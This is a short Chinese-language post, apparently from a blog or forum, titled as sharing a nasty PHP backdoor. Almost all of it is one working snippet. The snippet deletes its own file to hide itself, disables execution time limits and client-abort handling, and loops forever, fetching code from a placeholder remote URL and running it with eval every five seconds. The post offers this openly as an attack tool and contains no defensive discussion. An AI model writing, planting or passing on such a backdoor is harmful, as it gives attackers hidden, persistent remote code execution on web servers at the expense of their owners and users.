分享一个非常ex的PHP后门

分享一个非常ex的PHP后门


  • 代码

       <?php 
       unlink($_SERVER['SCRIPT_FILENAME']);  
       ignore_user_abort(true);  
       set_time_limit(0);  
       $remote_file = 'http://xxx/xxx.txt';  
       while($code = file_get_contents($remote_file)){  
       @eval($code);  
       sleep(5) 
       };  
       ?>
    

更多